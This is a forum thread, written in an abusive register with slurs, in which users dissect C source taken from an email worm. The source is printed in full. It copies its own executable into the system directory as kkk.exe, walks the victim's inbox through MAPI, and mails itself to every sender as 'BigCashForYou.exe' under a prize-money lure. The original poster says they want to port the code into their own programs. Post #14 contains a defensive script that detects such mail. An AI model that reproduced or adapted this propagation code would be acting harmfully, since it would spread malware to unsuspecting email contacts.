What does this C code do?

  1. #1
    Sophie Pedophile Tech Support
    Repost from https://niggasin.space/thread/14950 because i realized byzantine thread titles are not conducive to discussion.


    #include <windows.h>
    #include <mapi.h>
    #include <string.h>

    /* Defined elsewhere in the same program (the routine is posted further down this thread) */
    void SendMail(char *addr, LPMAPISENDMAIL SnM, LHANDLE lhSession, char *VirPath);

    /* MAPI mailing routine */
    DWORD WINAPI MailMySelf(LPVOID Data)
    {
        /* Variables and pointers to MAPI functions */
        CHAR rgchMsgID[513];
        MapiMessage *lpMessage;
        HINSTANCE hi;
        LPMAPILOGON MAPILogon;
        LPMAPIFINDNEXT MAPIFindNext;
        LPMAPIREADMAIL MAPIReadMail;
        LPMAPISENDMAIL MAPISendMail;
        LPMAPILOGOFF MAPILogoff;
        LHANDLE lhSession;
        char dropper[MAX_PATH];
        char MyPath[MAX_PATH];

        if (!(hi = LoadLibrary("mapi32.dll")))
        {
            /* Fail to load mapi */
            return 0;
        }

        /* Get mapi functions (resolved at run time, so mapi32.dll is not an import-table dependency) */
        MAPILogon = (LPMAPILOGON)GetProcAddress(hi, "MAPILogon");
        MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress(hi, "MAPIFindNext");
        MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress(hi, "MAPIReadMail");
        MAPISendMail = (LPMAPISENDMAIL)GetProcAddress(hi, "MAPISendMail");
        MAPILogoff = (LPMAPILOGOFF)GetProcAddress(hi, "MAPILogoff");

        /* Check them */
        if (MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL ||
            MAPISendMail == NULL || MAPILogoff == NULL)
        {
            /* No MAPI functions :( */
            FreeLibrary(hi);
            return 0;
        }

        /* Copy to dropper: own executable -> <system directory>\kkk.exe */
        GetModuleFileName(NULL, MyPath, MAX_PATH);
        GetSystemDirectory(dropper, MAX_PATH);
        strcat(dropper, "\\kkk.exe");
        CopyFile(MyPath, dropper, FALSE);

        /* Ok !, try to login (default profile, no credentials) */
        if (MAPILogon(0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
        {
            /* Empty seed ID: MAPIFindNext starts from the first message in the inbox */
            rgchMsgID[0] = '\0';

            while (1)
            {
                /* Walk every message; the ID just found becomes the seed for the next call */
                if (MAPIFindNext(lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
                {
                    break;
                }

                /* Read mail (MAPI_PEEK leaves it marked unread) */
                if (MAPIReadMail(lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
                {
                    /* Send ! (reply to whoever sent this message, attaching the dropper) */
                    SendMail(lpMessage->lpOriginator->lpszAddress, MAPISendMail,
                             lhSession, dropper);
                }
            }

            MAPILogoff(lhSession, 0L, 0L, 0L);
        }

        FreeLibrary(hi);
        return 0;
    }
  2. #2
    Lanny Bird of Courage
    Some kind of win32 wank. Looks like it tried to log in to a MAPI session with default credentials and then forward every message to, uhh, I guess it dumps them into some directory? Not really sure, the SendMail function near the end there doesn't appear to be part of the win32 api nor is it defined in that file so it's hard to say exactly how it works. I mean presumably it sends mail but I can't find any docs on what the args are.
  3. #3
    aldra JIDF Controlled Opposition
    it's only a module from a larger program, but:


    the first part is just testing to make sure the messaging API (basic email functionality) is available and functioning.

    This part first gets the path of the application and stores it in MyPath.
    It then generates the location of the system folder and adds 'kkk.exe' to the end (i.e. c:\windows\kkk.exe) and stores it in 'dropper'.
    The last part copies the current application into the path specified in dropper.

    GetModuleFileName(NULL,MyPath,MAX_PATH);
    GetSystemDirectory(dropper,MAX_PATH);
    strcat(dropper,"\\kkk.exe");
    CopyFile(MyPath,dropper,FALSE);


    The rest is related to sending an email, important part is:


    SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)


    See MAPI::SendMail reference: link

    It's basically sending the path of the copied dropper file (c:\windows\kkk.exe), but I'm not familiar with the MAPI so I don't know who to.

    lpMessage->lpOriginator->lpszAddress should indicate the target recipient, and that could either mean to send to itself or to an address that's specified somewhere else in the code
  4. #4
    Do Hispanics code in Si?
  5. #5
    aldra JIDF Controlled Opposition
    they mexicode
  6. #6
    Tacode
  7. #7
    aldra JIDF Controlled Opposition
    ***actually I'm not certain it's using email because I can't work out the destination; MAPI apparently has the capability to handle both email and DCOM messaging
  8. #8
    Sophie Pedophile Tech Support
    Originally posted by aldra it's only a module from a larger program, but:


    the first part is just testing to make sure the messaging API (basic email functionality) is available and functioning.

    This part first gets the path of the application and stores it in MyPath.
    It then generates the location of the system folder and adds 'kkk.exe' to the end (i.e. c:\windows\kkk.exe) and stores it in 'dropper'.
    The last part copies the current application into the path specified in dropper.

    GetModuleFileName(NULL,MyPath,MAX_PATH);
    GetSystemDirectory(dropper,MAX_PATH);
    strcat(dropper,"\\kkk.exe");
    CopyFile(MyPath,dropper,FALSE);


    The rest is related to sending an email, important part is:


    SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)


    See MAPI::SendMail reference: link

    It's basically sending the path of the copied dropper file (c:\windows\kkk.exe), but I'm not familiar with the MAPI so I don't know who to.

    lpMessage->lpOriginator->lpszAddress should indicate the target recipient, and that could either mean to send to itself or to an address that's specified somewhere else in the code

    Like i mentioned in my original thread i reckoned this was part of a worm type of behavioral routine. It comes from a malware originally, if you'd like i can post all the source here but that's a lot of code and a functional malware, lel.

    Sounds plausible? Because if so, i need to use renki-jutsu to transmute this into something i can use with my own programs, preferably in Python.
  9. #9
    Sophie Pedophile Tech Support
    Originally posted by aldra ***actually I'm not certain it's using email because I can't work out the destination; MAPI apparently has the capability to handle both email and DCOM messaging

    Correct, MAPI is a COM object on its own as well. So the question is, can you transfer arbitrary data with MAPI?
  10. #10
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Like i mentioned in my original thread i reckoned this was part of a worm type of behavioral routine. It comes from a malware originally, if you'd like i can post all the source here but that's a lot of code and a functional malware, lel.

    Sounds plausible? Because if so, i need to use renki-jutsu to transmute this into something i can use with my own programs, preferably in Python.

    SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)


    That's the line that actually sends the message; the content of the message is the variable 'dropper'. As per the first section, 'dropper' only contains the path of the malware, not the actual content, so if this is used to spread it then it would require another component that receives the message and retrieves the malware from the given path.
  11. #11
    Sophie Pedophile Tech Support
    Originally posted by aldra
    SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)


    That's the line that actually sends the message; the content of the message is the variable 'dropper'. As per the first section, 'dropper' only contains the path of the malware, not the actual content, so if this is used to spread it then it would require another component that receives the message and retrieves the malware from the given path.

    Lemme CTRL+F dropper real quick.
  12. #12
    Sophie Pedophile Tech Support
    Oh i found this too, this seems to be related to what i posted originally.


    #include <windows.h>
    #include <mapi.h>
    #include <stdlib.h>

    /* This is the function that sends e-mail */
    void SendMail(char *addr, LPMAPISENDMAIL SnM, LHANDLE lhSession, char *VirPath)
    {
        /* build mail */
        MapiRecipDesc *recips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));

        /* MapiFileDesc fields: ulReserved, flFlags, nPosition (-1 = not placed inline in the text),
           lpszPathName (file read from disk), lpszFileName (name the recipient sees), lpFileType */
        MapiFileDesc attachment = { 0, 0, (ULONG)-1, VirPath, "BigCashForYou.exe", NULL };

        /* MapiMessage fields: ulReserved, lpszSubject, lpszNoteText, lpszMessageType,
           lpszDateReceived, lpszConversationID, flFlags, lpOriginator,
           nRecipCount, lpRecips, nFileCount, lpFiles */
        MapiMessage note = { 0, "You are a very lucky man, read this mail!",
            "Hi, you won a big amount of money!!! If you want to know more look at the attachment!", NULL,
            NULL, NULL, 0, NULL, 1, recips, 1, &attachment };

        if (recips == NULL)
        {
            /* malloc failed, nothing to send with */
            return;
        }

        recips->ulReserved = 0;
        recips->ulRecipClass = MAPI_TO;
        recips->lpszName = addr;
        recips->lpszAddress = addr;
        recips->ulEIDSize = 0;
        recips->lpEntryID = NULL;

        /* Send ! */
        SnM(lhSession, 0L, &note, 0L, 0L);

        /* free memory */
        free(recips);
    }



    EDIT: I am not paying enough attention to this, lel. Updated the code
  13. #13
    Sophie Pedophile Tech Support
    Lmao @ "You are a very lucky man, read this mail!" typical spam opening. I gather the intention is to mail itself places.
  14. #14
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Oh i found this too, this seems to be related to what i posted originally.


    #include <windows.h>
    #include <mapi.h>
    #include <stdlib.h>

    /* This is the function that sends e-mail */
    void SendMail(char *addr, LPMAPISENDMAIL SnM, LHANDLE lhSession, char *VirPath)
    {
        /* build mail */
        MapiRecipDesc *recips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));

        /* MapiFileDesc fields: ulReserved, flFlags, nPosition (-1 = not placed inline in the text),
           lpszPathName (file read from disk), lpszFileName (name the recipient sees), lpFileType */
        MapiFileDesc attachment = { 0, 0, (ULONG)-1, VirPath, "BigCashForYou.exe", NULL };

        /* MapiMessage fields: ulReserved, lpszSubject, lpszNoteText, lpszMessageType,
           lpszDateReceived, lpszConversationID, flFlags, lpOriginator,
           nRecipCount, lpRecips, nFileCount, lpFiles */
        MapiMessage note = { 0, "You are a very lucky man, read this mail!",
            "Hi, you won a big amount of money!!! If you want to know more look at the attachment!", NULL,
            NULL, NULL, 0, NULL, 1, recips, 1, &attachment };

        if (recips == NULL)
        {
            /* malloc failed, nothing to send with */
            return;
        }

        recips->ulReserved = 0;
        recips->ulRecipClass = MAPI_TO;
        recips->lpszName = addr;
        recips->lpszAddress = addr;
        recips->ulEIDSize = 0;
        recips->lpEntryID = NULL;

        /* Send ! */
        SnM(lhSession, 0L, &note, 0L, 0L);

        /* free memory */
        free(recips);
    }



    EDIT: I am not paying enough attention to this, lel. Updated the code

    lol ok, they have their own SendMail function, not using the default API.

    You're right - the previous code passes the 'dropper' path to SendMail(), which then gets the file and adds it as an attachment to the outbound email.
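    The routine the thread has reconstructed produces mail with three recognisable traits: the lure subject and body text quoted above, an executable attachment, and a display name (lpszFileName) that can differ from what the bytes actually are. Below is an added Python example, not code from this thread or from the malware, that triages a message for those traits from a defender's side. The sample messages, the placeholder addresses and the "MZ" stub attachment are constructed for the example (the stub is only a DOS-header magic, not an executable).

```python
"""Added example: triage a mail message for the mass-mailer traits seen
in the thread's SendMail() routine. Sample messages are constructed here;
the MZ stub is only a DOS header, not a real executable."""
import email
import re
from email import policy
from email.message import EmailMessage
from typing import Optional

# Lure wording taken from the MapiMessage initializer quoted in the thread.
LURE_PATTERNS = [
    re.compile(r"\blucky man\b", re.I),
    re.compile(r"\bwon\b.*\bmoney\b", re.I | re.S),
    re.compile(r"look at the attachment", re.I),
]
# Extensions Windows runs directly when the attachment is opened.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}
# Constructed stand-in for a PE payload: just the 'MZ' DOS-header magic.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60


def looks_like_pe(payload: bytes) -> bool:
    """Windows executables start with the two-byte 'MZ' DOS header."""
    return payload[:2] == b"MZ"


def triage_message(raw: bytes) -> dict:
    """Return the findings for one RFC 5322 message given as raw bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    # 1. Lure text: check subject plus the plain-text body together.
    body = msg.get_body(preferencelist=("plain",))
    text = msg.get("Subject", "") + "\n" + (body.get_content() if body else "")
    if any(p.search(text) for p in LURE_PATTERNS):
        findings.append("lure_text")

    # 2./3. Attachments: executable by name, or PE bytes behind another name.
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = name[name.rfind("."):].lower() if "." in name else ""
        payload = part.get_payload(decode=True) or b""
        if ext in EXEC_EXTENSIONS:
            findings.append(f"executable_attachment:{name}")
        elif looks_like_pe(payload):
            # lpszFileName is free text, so PE content can hide behind e.g. ".pdf"
            findings.append(f"pe_with_misleading_name:{name}")

    return {"findings": findings, "suspicious": bool(findings)}


def build_sample(subject: str, body: str, attachment_name: Optional[str] = None,
                 payload: bytes = b"") -> bytes:
    """Construct a test message; the addresses are placeholder domains."""
    m = EmailMessage()
    m["From"] = "victim@example.invalid"
    m["To"] = "originator@example.invalid"
    m["Subject"] = subject
    m.set_content(body)
    if attachment_name is not None:
        m.add_attachment(payload, maintype="application",
                         subtype="octet-stream", filename=attachment_name)
    return m.as_bytes()


if __name__ == "__main__":
    worm_mail = build_sample("You are a very lucky man, read this mail!",
                             "Hi, you won a big amount of money!!! If you want "
                             "to know more look at the attachment!",
                             "BigCashForYou.exe", FAKE_PE)
    print(triage_message(worm_mail))
```

    Run against the constructed worm-style message it reports both the lure text and the executable attachment; a message carrying the same MZ bytes under a "report.pdf" name is caught by the content check alone, which is the case a filename-only filter misses. In a mail gateway the same three checks would be applied to outbound mail too, since this routine sends from the infected user's own session to every originator found in the inbox.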
  15. #15
    Sophie Pedophile Tech Support
    Mystery solved! Thank you for your participation everyone! Next week we will do some more community reversing.
  16. #16
    fag Houston
    Just hit alt f4 and it will bring up debugging linux proxy.
  17. #17
    Sophie Pedophile Tech Support
    Originally posted by fag Just hit alt f4 and it will bring up debugging linux proxy.

    You don't even know what debugging means fucko.
  18. #18
    fag Houston
    I bet you did it and that's why you're salty.
  19. #19
    Sophie Pedophile Tech Support
    Originally posted by fag I bet you did it and that's why you're salty.

    The reason i am slightly annoyed is because you insult my intelligence, hurp durp alt+f4. That's `rm -rf /` levels of retarded.
  20. #20
    fag Houston
    It was just a joke brah, i'm not insulting your intelligence, I'm just bored.